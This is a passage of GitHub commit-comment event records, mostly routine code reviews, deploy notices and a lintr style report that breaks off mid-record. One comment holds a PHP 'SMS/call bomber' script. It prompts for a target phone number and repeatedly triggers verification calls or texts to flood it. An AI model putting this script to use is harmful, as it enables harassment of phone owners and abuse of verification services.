{"id":"7920708687","type":"CommitCommentEvent","actor":{"login":"hailton"},"repo":{"name":"Asheraf/Translation"},"payload":{"comment":{"id":29600928,"position":null,"line":null,"path":null,"commit_id":"39a0ee396ce48b3efd5dc2ac413cf879821d7336","created_at":"2018-07-05T02:52:49Z","updated_at":"2018-07-05T02:52:49Z","author_association":"NONE","body":"Contribution Texture Translation 100%\r\nDownload: http://goo.gl/JYx8jM\r\n- iRO + kRO based\r\n- refined"}},"created_at":"2018-07-05T02:52:49Z"}
{"id":"7920711912","type":"CommitCommentEvent","actor":{"login":"roycan"},"repo":{"name":"roycan/roycan.github.io"},"payload":{"comment":{"id":29600944,"position":null,"line":null,"path":null,"commit_id":"8f398f27040808544d4093aa89cf8bfded117af1","created_at":"2018-07-05T02:54:15Z","updated_at":"2018-07-05T02:54:15Z","author_association":"OWNER","body":"this is a better file.  i want this back"}},"created_at":"2018-07-05T02:54:15Z"}
{"id":"7920716616","type":"CommitCommentEvent","actor":{"login":"hailton"},"repo":{"name":"Asheraf/Translation"},"payload":{"comment":{"id":29600948,"position":null,"line":null,"path":null,"commit_id":"39a0ee396ce48b3efd5dc2ac413cf879821d7336","created_at":"2018-07-05T02:56:07Z","updated_at":"2018-07-05T02:56:07Z","author_association":"NONE","body":"[Contribution] Texture Translation 100%\r\nDownload: http://goo.gl/JYx8jM\r\n- iRO + kRO based\r\n- refined"}},"created_at":"2018-07-05T02:56:07Z"}
{"id":"7920717161","type":"CommitCommentEvent","actor":{"login":"zidanrahmandani"},"repo":{"name":"zidanrahmandani/Bang-Ch3m0d_zrd"},"payload":{"comment":{"id":29600949,"position":null,"line":null,"path":null,"commit_id":"425f04a39dd4503d0bea3b98b1f617e103f1e803","created_at":"2018-07-05T02:56:19Z","updated_at":"2018-07-05T02:56:19Z","author_association":"OWNER","body":"<?phpinclude 'func.php';/* https://github.com/nee48/BomTelpSmsTokped Made by Chemod_zrd404*/$init = new Bom();//Eksekusi Call/Sms Boomber (Limit 100x/Jam)echo \"Nomor Target : \";$a = trim(fgets(STDIN));$init->no = \"$a\";$init->type = 2; //Type 2 untuk telpon, Type 1 untuk sms//$init->no = \"0895371761108\"; //Nomer Hp tujuanif ($init->type == 1) {\tfor ($i=0; $i < 2; $i++) { \t $init->Verif($init->no,$init->type);\t}}elseif ($init->type == 2) {\t $init->Verif($init->no,$init->type);}"}},"created_at":"2018-07-05T02:56:19Z"}
{"id":"7920719787","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29600952,"position":null,"line":null,"path":null,"commit_id":"fcd4b0240b2da6b61035375e214a3592c6bc3f01","created_at":"2018-07-05T02:57:21Z","updated_at":"2018-07-05T02:57:21Z","author_association":"OWNER","body":"I personally think it is [-3, 1]. [0, 4] is a happy middle ground imo. \r\nI say run the STC, if it passes, get SN to confirm bounds."}},"created_at":"2018-07-05T02:57:21Z"}
{"id":"7925269897","type":"CommitCommentEvent","actor":{"login":"Phyrik"},"repo":{"name":"Syfix-Studios/Explorio"},"payload":{"comment":{"id":29612918,"position":null,"line":null,"path":null,"commit_id":"89d1edd8ca2370fb06c57dd6b75469456ba835c5","created_at":"2018-07-05T20:00:15Z","updated_at":"2018-07-05T20:00:15Z","author_association":"CONTRIBUTOR","body":"Sure"}},"created_at":"2018-07-05T20:00:15Z"}
{"id":"7925273310","type":"CommitCommentEvent","actor":{"login":"wilberforce"},"repo":{"name":"espruino/Espruino"},"payload":{"comment":{"id":29612937,"position":null,"line":null,"path":null,"commit_id":"71524e9bc03af33d407543ab92a1106e78ee3f4b","created_at":"2018-07-05T20:00:57Z","updated_at":"2018-07-05T20:00:57Z","author_association":"CONTRIBUTOR","body":"Has something changed your workflow?\r\n\r\nNow there seems to quite a merge master branch commits that bring in changes you have already made\r\n\r\nE.g in this case \r\n\r\nhttps://github.com/espruino/Espruino/commit/23da440218eb9dc0dfaf96757a0d84de75c56048"}},"created_at":"2018-07-05T20:00:57Z"}
{"id":"7925273426","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29612939,"position":null,"line":null,"path":null,"commit_id":"da051a5eea38ddcb5eb7f02a65aa912c4e48ae8f","created_at":"2018-07-05T20:00:58Z","updated_at":"2018-07-05T20:00:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-102](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-102).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-102-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-05T20:00:58Z"}
{"id":"7925274756","type":"CommitCommentEvent","actor":{"login":"buddybu"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29612944,"position":null,"line":null,"path":null,"commit_id":"b34d0910283250ed0d20f4a6e2e8a6ac5f90ea55","created_at":"2018-07-05T20:01:15Z","updated_at":"2018-07-05T20:01:15Z","author_association":"NONE","body":"I have pulled this branch and change.  So far it has corrected the problem on the latest fast insider build."}},"created_at":"2018-07-05T20:01:15Z"}
{"id":"7925275632","type":"CommitCommentEvent","actor":{"login":"element-82"},"repo":{"name":"Wind-River/meta-device-cloud"},"payload":{"comment":{"id":29612947,"position":null,"line":null,"path":null,"commit_id":"f5e684d1805e2bdc2962ec75c2239bebff63c742","created_at":"2018-07-05T20:01:26Z","updated_at":"2018-07-05T20:01:26Z","author_association":"COLLABORATOR","body":"This breaks IDP postinst rules.  Reverting this commit."}},"created_at":"2018-07-05T20:01:26Z"}
{"id":"7925280351","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29612954,"position":140,"line":142,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:02:26Z","updated_at":"2018-07-05T20:02:26Z","author_association":"NONE","body":"for the case of  `DONT_UPDATE_BUFFER` you can have the buffer be normal size (not 4x larger) and not do round robin on it"}},"created_at":"2018-07-05T20:02:26Z"}
{"id":"7925282638","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29612958,"position":143,"line":145,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:02:56Z","updated_at":"2018-07-05T20:02:56Z","author_association":"NONE","body":"Remember to flush for TEST_CASE 3\r\n\r\n*no pun intended"}},"created_at":"2018-07-05T20:02:56Z"}
{"id":"7925284009","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29612961,"position":null,"line":null,"path":null,"commit_id":"fc4e46854e99c83b8299d8fdab5b4c32c23f5671","created_at":"2018-07-05T20:03:15Z","updated_at":"2018-07-05T20:03:15Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-105](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-105).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-105-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-05T20:03:15Z"}
{"id":"7925284358","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612963,"position":41,"line":64,"path":"Dodo.Core.UnitTests/DomainModel/Departments/Units/PizzeriaTests.cs","commit_id":"2d3b8f5b3c692e8bb0ad641a3d7b6214e5b5dca0","created_at":"2018-07-05T20:03:19Z","updated_at":"2018-07-05T20:03:19Z","author_association":"MEMBER","body":"Запутывающее название теста.\r\nИз названия выглядит, как будто сойдет любое число больше 12, но это не так.\r\nКак бы вы объяснили логику этого метода своему коту? Сформулируйте это по-русски, а потом переведите на английский :)"}},"created_at":"2018-07-05T20:03:19Z"}
{"id":"7925285103","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29612965,"position":131,"line":135,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:03:29Z","updated_at":"2018-07-05T20:03:29Z","author_association":"NONE","body":"dont forget about TEST_CASE 1, if `DONT_UPDATE_BUFFER` you want to create it up front "}},"created_at":"2018-07-05T20:03:29Z"}
{"id":"7925287144","type":"CommitCommentEvent","actor":{"login":"Ceridan"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612966,"position":16,"line":116,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T20:03:55Z","updated_at":"2018-07-05T20:03:55Z","author_association":"NONE","body":"Да, понял, было не очень консистентно по сравнению с другими, согласен."}},"created_at":"2018-07-05T20:03:55Z"}
{"id":"7925290925","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612973,"position":null,"line":null,"path":null,"commit_id":"adf6b247cac54b3d78dbca5d901e96db62e04972","created_at":"2018-07-05T20:04:47Z","updated_at":"2018-07-05T20:04:47Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T20:04:47Z"}
{"id":"7925291099","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29612974,"position":null,"line":null,"path":null,"commit_id":"17ee75c2c3c431bc7c6560ff1eac87dbceb62ef4","created_at":"2018-07-05T20:04:49Z","updated_at":"2018-07-05T20:04:49Z","author_association":"NONE","body":"Perhaps I didn't understand well the idea. But why you try to avoid negative votes?"}},"created_at":"2018-07-05T20:04:49Z"}
{"id":"7925296825","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612986,"position":41,"line":64,"path":"Dodo.Core.UnitTests/DomainModel/Departments/Units/PizzeriaTests.cs","commit_id":"2d3b8f5b3c692e8bb0ad641a3d7b6214e5b5dca0","created_at":"2018-07-05T20:06:04Z","updated_at":"2018-07-05T20:06:04Z","author_association":"MEMBER","body":"Я бы назвал как-нибудь вроде\r\nGetMonthsOld_ReturnsPizzeriaAgeInMonths_ForYoungPizzeria\r\nGetMonthsOld_ReturnsPizzeriaAgeInMonths_ForOldPizzeria\r\nпередавайте в названии теста *смысл* тест кейса"}},"created_at":"2018-07-05T20:06:04Z"}
{"id":"7925296831","type":"CommitCommentEvent","actor":{"login":"Monk909"},"repo":{"name":"bl00w/codewars.com-kata-counting-duplicates"},"payload":{"comment":{"id":29612987,"position":11,"line":11,"path":"src/CountingDuplicates.java","commit_id":"ab89e52a51661c894071a213c03964784f419cd8","created_at":"2018-07-05T20:06:04Z","updated_at":"2018-07-05T20:06:04Z","author_association":"NONE","body":"Not getting this. Can you please explain it?"}},"created_at":"2018-07-05T20:06:04Z"}
{"id":"7925299731","type":"CommitCommentEvent","actor":{"login":"starriebird"},"repo":{"name":"starriebird/pantheon-electro-core"},"payload":{"comment":{"id":29613000,"position":null,"line":null,"path":null,"commit_id":"dcf541be141b73b4bf6a15f3d4bf451cffa1a0cd","created_at":"2018-07-05T20:06:44Z","updated_at":"2018-07-05T20:06:44Z","author_association":"OWNER","body":"Created multidev environment [pantheon-electro-core#ci-1](https://dashboard.pantheon.io/sites/378188a0-458c-43fe-869f-3ab11c524145#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-pantheon-electro-core.pantheonsite.io/)"}},"created_at":"2018-07-05T20:06:44Z"}
{"id":"7925307789","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29613009,"position":45,"line":135,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T20:08:27Z","updated_at":"2018-07-05T20:08:27Z","author_association":"MEMBER","body":"да, параметризованный тут лучше чем 4 ассерта"}},"created_at":"2018-07-05T20:08:27Z"}
{"id":"7925310961","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29613021,"position":null,"line":null,"path":null,"commit_id":"993e143024de61ebf2efb4b5fb1adcae38ed0cf1","created_at":"2018-07-05T20:09:13Z","updated_at":"2018-07-05T20:09:13Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 